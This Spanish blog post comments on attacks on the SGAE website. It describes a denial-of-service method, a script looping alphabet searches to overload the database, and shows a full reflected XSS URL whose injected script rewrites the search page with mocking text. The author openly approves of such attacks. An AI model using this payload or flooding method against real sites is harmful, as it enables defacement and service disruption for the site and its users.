Ataques a SGAE

En esta semana ha llegado a mis manos varios problemillas en la web de la SGAE http://www.sgae.es

Resulta ser que algún individuo aburrido utilizando un rudimentario ataque de overflood a la base de datos ha conseguido saturarla hasta que la web encolaba las peticiones Mysql y daba timeouts por todos lados.

Básicamente el método consistió en lanzar en un script búsquedas desde la A-Z en distintos idiomas en un bucle con X repeticiones.

Por ejemplo: http://www.sgae.es/search/search-es.jsp?idioma=es&select=es&texto=a

A los pocos segundos de lanzar el ataque el report que daba la web

AL no conectar al bd dice que no encuentra ninguna referencia y la pagina principal no tira de la misma bd por lo que el ataque no ha tenido mucho exito.

No obstante todas las noticias de ataques a la SGAE son bien recibidas ?
JEJe, Como el ultimo bug descubierto en las búsquedas de la web que permitía la inyección de código en el resultado y podíamos leer resultados bastante graciosos para la búsqueda de SGAE.

http://www.sgae.es/search/search-es.jsp?idioma=es&select=es&texto=%3Cscript%3Ed=document.getElementsByTagName(%22td%22);for(i=0;i%3Cd.length;i%2B%2B){if(i==30)%20d[i].innerHTML=%22%3Ch2%3EPREGUNTA:%20%BFCu%E1l%20es%20el%20acr%F3nimo%20de%20SGAE?%3C/h2%3E%3Cp%3EMucha%20gente%20nos%20pregunta%20por%20ello%20%FAltimamente,%20as%ED%20que%20hemos%20decidido%20publicarlo.%20El%20acr%F3nimo%20oficial%20es%20Siempre%20Ganamos%20Algunos%20Euros%20(SGAE).%3C/p%3E%3Ch2%3EPREGUNTA:%20%BFS%F3mos%20unos%20ladrones?%3C/h2%3E%3Cp%3EPor%20supuesto,%20siempre%20hemos%20estado%20robando%20a%20la%20gente%20de%20la%20calle.%20Hasta%20le%20quitamos%20dinero%20a%20la%20gente%20desamparada.%20%A1Luego%20ya%20haremos%20un%20concierto%20ben%E9fico%20para%20solucionarlo!%3C/p%3E%22;}%3C/script%3E

La ultima iniciativa interesante que ha llegado a mis manos es que en la próxima ocasión de votar en vez de introducir un voto en blanco, o cualquier otra cosa con menos sentido aun se introduzca la siguiente imagen.

Un saludo a todos.